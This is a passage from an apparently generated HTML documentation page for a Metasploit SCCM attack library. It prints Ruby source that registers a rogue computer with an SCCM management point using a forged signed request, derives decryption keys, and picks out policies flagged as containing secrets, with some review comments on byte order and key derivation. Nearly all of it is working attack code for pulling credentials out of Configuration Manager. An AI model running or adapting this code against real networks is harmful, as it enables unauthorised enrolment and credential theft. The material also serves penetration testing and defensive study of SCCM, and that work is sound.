<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CCM_POST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>data</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Type</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>multipart/mixed; boundary=&quot;aAbBcCdDv1234567890VxXyYzZ&quot;</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_http_response'>http_response</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_raw'>send_request_raw</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>MIME</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>unless</span> <span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_parts'>parts</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='op'>&amp;.</span><span class='id identifier rubyid_content'>content</span>
<span class='id identifier rubyid_compressed_response'>compressed_response</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_zlib_inflate'>zlib_inflate</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_parts'>parts</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_content'>content</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_xml_doc'>xml_doc</span> <span class='op'>=</span> <span class='const'>Nokogiri</span><span class='op'>::</span><span class='const'>XML</span><span class='lparen'>(</span><span class='id identifier rubyid_compressed_response'>compressed_response</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_policies'>policies</span> <span class='op'>=</span> <span class='id identifier rubyid_xml_doc'>xml_doc</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>//Policy</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_secret_policies'>secret_policies</span> <span class='op'>=</span> <span class='id identifier rubyid_policies'>policies</span><span class='period'>.</span><span class='id identifier rubyid_select'>select</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_policy'>policy</span><span class='op'>|</span>
<span class='id identifier rubyid_flags'>flags</span> <span class='op'>=</span> <span class='id identifier rubyid_policy'>policy</span><span class='period'>.</span><span class='id identifier rubyid_attributes'>attributes</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PolicyFlags</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>next</span> <span class='kw'>if</span> <span class='id identifier rubyid_flags'>flags</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_flags'>flags</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span> <span class='op'>&amp;</span> <span class='const'><span class='object_link'><a href="#SECRET_POLICY_FLAG-constant" title="Msf::Exploit::Remote::HTTP::SCCM::SECRET_POLICY_FLAG (constant)">SECRET_POLICY_FLAG</a></span></span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="#SECRET_POLICY_FLAG-constant" title="Msf::Exploit::Remote::HTTP::SCCM::SECRET_POLICY_FLAG (constant)">SECRET_POLICY_FLAG</a></span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_urls'>urls</span> <span class='op'>=</span> <span class='id identifier rubyid_secret_policies'>secret_policies</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_policy'>policy</span><span class='op'>|</span>
<span class='id identifier rubyid_policy'>policy</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PolicyLocation/text()</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_text'>text</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_urls'>urls</span> <span class='op'>=</span> <span class='id identifier rubyid_urls'>urls</span><span class='period'>.</span><span class='id identifier rubyid_reject'>reject</span><span class='lparen'>(</span><span class='op'>&amp;</span><span class='symbol'>:blank?</span><span class='rparen'>)</span>
<span class='id identifier rubyid_urls'>urls</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_url'>url</span><span class='op'>|</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Found policy containing secrets: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_url'>url</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_urls'>urls</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="make_ms_pubkey-instance_method">
#<strong>make_ms_pubkey</strong>(pub_key) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Build a Microsoft RSA public key blob from <tt>pub_key</tt> and return it as a hex string. Structure reference: <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb">learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb</a></p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
</td>
<td>
<!--
  make_ms_pubkey(pub_key): serialises an RSA public key into a Microsoft-style
  public key blob and returns it as a lowercase hex string.

  pub_key: object exposing e (public exponent) and n (modulus); presumably an
           OpenSSL RSA public key (confirm against callers).
  Returns: String, the hex encoding produced by unpack('H*') of the assembled bytes.

  Layout as written by the code:
    1. 12 fixed bytes: 06 02 00 00 00 A4 00 00 followed by ASCII "RSA1". These match
       the PUBLICKEYBLOB header fields bType=0x06, bVersion=0x02, reserved=0,
       aiKeyAlg=0x0000A400, followed by the RSAPUBKEY magic.
    2. KEY_SIZE and pub_key.e packed with 'II' (two native-endian unsigned ints).
    3. The modulus, taken from its hexadecimal representation via pack('H*').

  NOTE(review): 'I' follows host byte order; 'V' would pin both fields to
  little-endian regardless of platform.
  NOTE(review): pack('H*') emits the modulus most significant byte first, whereas
  CryptoAPI key blobs store the modulus little-endian. Confirm which byte order
  the receiving side expects.
  NOTE(review): to_s(16) drops leading zero nibbles; an odd digit count would make
  pack('H*') pad on the right and shift the value. Not expected for a modulus whose
  top bit is set, but the code does not check.
  NOTE(review): KEY_SIZE is written as the bit length regardless of the actual size
  of pub_key.n, so a key of a different size would yield an inconsistent blob.
-->
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 260</span>
<span class='kw'>def</span> <span class='id identifier rubyid_make_ms_pubkey'>make_ms_pubkey</span><span class='lparen'>(</span><span class='id identifier rubyid_pub_key'>pub_key</span><span class='rparen'>)</span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x06\x02\x00\x00\x00\xA4\x00\x00\x52\x53\x41\x31</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>+=</span> <span class='lbracket'>[</span><span class='const'><span class='object_link'><a href="#KEY_SIZE-constant" title="Msf::Exploit::Remote::HTTP::SCCM::KEY_SIZE (constant)">KEY_SIZE</a></span></span><span class='comma'>,</span> <span class='id identifier rubyid_pub_key'>pub_key</span><span class='period'>.</span><span class='id identifier rubyid_e'>e</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>II</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>+=</span> <span class='lbracket'>[</span><span class='id identifier rubyid_pub_key'>pub_key</span><span class='period'>.</span><span class='id identifier rubyid_n'>n</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='lparen'>(</span><span class='int'>16</span><span class='rparen'>)</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_result'>result</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="mscrypt_derive_key_sha1-instance_method">
#<strong>mscrypt_derive_key_sha1</strong>(secret) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
</td>
<td>
<!--
  mscrypt_derive_key_sha1(secret): derives 24 bytes of key material from secret
  using SHA-1 only.

  secret: String passed directly to OpenSSL::Digest#digest.
  Returns: 24-byte binary String, SHA1(buf1) followed by the first 4 bytes of
           SHA1(buf2).

  Steps:
    1. hash = SHA1(secret), 20 bytes.
    2. buf1 is 64 bytes of 0x36 and buf2 is 64 bytes of 0x5C; the first 20 bytes
       of each are XORed with hash, the remaining bytes keep the fill value.
    3. Each buffer is hashed with SHA-1; the first digest is returned in full and
       the second is truncated to bytes 0..3.

  NOTE(review): this looks like the key-extension procedure documented for
  CryptDeriveKey when the requested key is longer than the hash output; 24 bytes
  would fit a 3DES key. Confirm against the caller.
  NOTE(review): a single unsalted SHA-1 pass with no iteration count. This is a
  compatibility derivation, not a password-hardening KDF, so the output is only as
  strong as the entropy of secret.
-->
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 305</span>
<span class='kw'>def</span> <span class='id identifier rubyid_mscrypt_derive_key_sha1'>mscrypt_derive_key_sha1</span><span class='lparen'>(</span><span class='id identifier rubyid_secret'>secret</span><span class='rparen'>)</span>
<span class='id identifier rubyid_buf1'>buf1</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='int'>0x36</span><span class='rbracket'>]</span> <span class='op'>*</span> <span class='int'>64</span>
<span class='id identifier rubyid_buf2'>buf2</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='int'>0x5C</span><span class='rbracket'>]</span> <span class='op'>*</span> <span class='int'>64</span>
<span class='id identifier rubyid_digest'>digest</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Digest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SHA1</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_hash'>hash</span> <span class='op'>=</span> <span class='id identifier rubyid_digest'>digest</span><span class='period'>.</span><span class='id identifier rubyid_digest'>digest</span><span class='lparen'>(</span><span class='id identifier rubyid_secret'>secret</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span>
<span class='id identifier rubyid_hash'>hash</span><span class='period'>.</span><span class='id identifier rubyid_each_with_index'>each_with_index</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_byte'>byte</span><span class='comma'>,</span> <span class='id identifier rubyid_i'>i</span><span class='op'>|</span>
<span class='id identifier rubyid_buf1'>buf1</span><span class='lbracket'>[</span><span class='id identifier rubyid_i'>i</span><span class='rbracket'>]</span> <span class='op'>^=</span> <span class='id identifier rubyid_byte'>byte</span>
<span class='id identifier rubyid_buf2'>buf2</span><span class='lbracket'>[</span><span class='id identifier rubyid_i'>i</span><span class='rbracket'>]</span> <span class='op'>^=</span> <span class='id identifier rubyid_byte'>byte</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_buf1'>buf1</span> <span class='op'>=</span> <span class='id identifier rubyid_buf1'>buf1</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_buf2'>buf2</span> <span class='op'>=</span> <span class='id identifier rubyid_buf2'>buf2</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_digest'>digest</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Digest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SHA1</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_hash1'>hash1</span> <span class='op'>=</span> <span class='id identifier rubyid_digest'>digest</span><span class='period'>.</span><span class='id identifier rubyid_digest'>digest</span><span class='lparen'>(</span><span class='id identifier rubyid_buf1'>buf1</span><span class='rparen'>)</span>
<span class='id identifier rubyid_digest'>digest</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Digest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SHA1</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_hash2'>hash2</span> <span class='op'>=</span> <span class='id identifier rubyid_digest'>digest</span><span class='period'>.</span><span class='id identifier rubyid_digest'>digest</span><span class='lparen'>(</span><span class='id identifier rubyid_buf2'>buf2</span><span class='rparen'>)</span>
<span class='id identifier rubyid_hash1'>hash1</span> <span class='op'>+</span> <span class='id identifier rubyid_hash2'>hash2</span><span class='lbracket'>[</span><span class='int'>0</span><span class='op'>..</span><span class='int'>3</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="register_request-instance_method">
#<strong>register_request</strong>(http_opts, management_point, key, cert, computer_user) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Send a client registration request to the SCCM management point to register our computer.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 113</span>
<span class='kw'>def</span> <span class='id identifier rubyid_register_request'>register_request</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span><span class='comma'>,</span> <span class='id identifier rubyid_computer_user'>computer_user</span><span class='rparen'>)</span>
<span class='id identifier rubyid_pub_key'>pub_key</span> <span class='op'>=</span> <span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_to_der'>to_der</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span>
<span class='id identifier rubyid_fqdn'>fqdn</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DOMAIN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_sent_time'>sent_time</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span><span class='period'>.</span><span class='id identifier rubyid_utc'>utc</span><span class='period'>.</span><span class='id identifier rubyid_iso8601'>iso8601</span>
<span class='id identifier rubyid_registration_request_data'>registration_request_data</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;Data HashAlgorithm=\&quot;1.2.840.113549.1.1.11\&quot; SMSID=\&quot;\&quot; RequestType=\&quot;Registration\&quot; TimeStamp=\&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sent_time'>sent_time</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot;&gt;&lt;AgentInformation AgentIdentity=\&quot;CCMSetup.exe\&quot; AgentVersion=\&quot;5.00.8325.0000\&quot; AgentType=\&quot;0\&quot; /&gt;&lt;Certificates&gt;&lt;Encryption Encoding=\&quot;HexBinary\&quot; KeyType=\&quot;1\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_pub_key'>pub_key</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Encryption&gt;&lt;Signing Encoding=\&quot;HexBinary\&quot; KeyType=\&quot;1\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_pub_key'>pub_key</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Signing&gt;&lt;/Certificates&gt;&lt;DiscoveryProperties&gt;&lt;Property Name=\&quot;Netbios Name\&quot; Value=\&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot; /&gt;&lt;Property Name=\&quot;FQ Name\&quot; Value=\&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fqdn'>fqdn</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot; /&gt;&lt;Property Name=\&quot;Locale ID\&quot; Value=\&quot;1033\&quot; /&gt;&lt;Property Name=\&quot;InternetFlag\&quot; Value=\&quot;0\&quot; /&gt;&lt;/DiscoveryProperties&gt;&lt;/Data&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_signature'>signature</span> <span class='op'>=</span> <span class='id identifier rubyid_rsa_sign'>rsa_sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_registration_request_data'>registration_request_data</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_registration_request'>registration_request</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;ClientRegistrationRequest&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_registration_request_data'>registration_request_data</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;Signature&gt;&lt;SignatureValue&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_signature'>signature</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SignatureValue&gt;&lt;/Signature&gt;&lt;/ClientRegistrationRequest&gt;\x00</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_rr_utf16'>rr_utf16</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_rr_utf16'>rr_utf16</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_registration_request'>registration_request</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_body_length'>body_length</span> <span class='op'>=</span> <span class='id identifier rubyid_rr_utf16'>rr_utf16</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span>
<span class='id identifier rubyid_rr_utf16'>rr_utf16</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\r\n</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_header'>header</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;Msg ReplyCompression=\&quot;zlib\&quot; SchemaVersion=\&quot;1.1\&quot;&gt;&lt;Body Type=\&quot;ByteRange\&quot; Length=\&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_body_length'>body_length</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot; Offset=\&quot;0\&quot; /&gt;&lt;CorrelationID&gt;{00000000-0000-0000-0000-000000000000}&lt;/CorrelationID&gt;&lt;Hooks&gt;&lt;Hook3 Name=\&quot;zlib-compress\&quot; /&gt;&lt;/Hooks&gt;&lt;ID&gt;{5DD100CD-DF1D-45F5-BA17-A327F43465F8}&lt;/ID&gt;&lt;Payload Type=\&quot;inline\&quot; /&gt;&lt;Priority&gt;0&lt;/Priority&gt;&lt;Protocol&gt;http&lt;/Protocol&gt;&lt;ReplyMode&gt;Sync&lt;/ReplyMode&gt;&lt;ReplyTo&gt;direct:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>:SccmMessaging&lt;/ReplyTo&gt;&lt;SentTime&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sent_time'>sent_time</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SentTime&gt;&lt;SourceHost&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SourceHost&gt;&lt;TargetAddress&gt;mp:MP_ClientRegistration&lt;/TargetAddress&gt;&lt;TargetEndpoint&gt;MP_ClientRegistration&lt;/TargetEndpoint&gt;&lt;TargetHost&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_management_point'>management_point</span><span class='period'>.</span><span class='id identifier rubyid_downcase'>downcase</span><span class='embexpr_end'>}</span><span 
class='tstring_content'>&lt;/TargetHost&gt;&lt;Timeout&gt;60000&lt;/Timeout&gt;&lt;/Msg&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_message'>message</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>MIME</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_bound'>bound</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>aAbBcCdDv1234567890VxXyYzZ</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_add_part'>add_part</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\ufeff</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_header'>header</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>text/plain; charset=UTF-16</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_add_part'>add_part</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_zlib_deflate'>zlib_deflate</span><span class='lparen'>(</span><span class='id identifier rubyid_rr_utf16'>rr_utf16</span><span class='rparen'>)</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>application/octet-stream</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>binary</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='id identifier rubyid_http_opts'>http_opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/ccm_system_windowsauth/request</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CCM_POST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>data</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
